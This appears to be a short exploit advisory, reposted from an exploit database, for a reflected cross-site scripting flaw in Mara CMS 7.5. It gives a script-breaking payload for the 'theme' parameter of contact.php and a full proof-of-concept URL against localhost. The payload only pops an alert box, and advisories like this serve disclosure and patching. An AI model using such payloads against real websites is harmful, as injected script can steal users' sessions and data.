Share
## https://sploitus.com/exploit?id=PACKETSTORM:158728
==============================================================================  
| # Title : Mara CMS 7.5 Cross Site Scripting |  
| # Author : George Tsimpidas |  
| # Tested on : Kali Linux (X64) |  
| # Vendor : https://sourceforge.net/projects/maracms/ |  
==============================================================================  
  
PoC  
  
  
[+] Use Payload : seven69387';alert(1)//154  
  
Path : http://localhost/contact.php?theme=< inject payload here>  
  
Full Poc :  
http://localhost/contact.php?theme=seven69387';alert(1)//154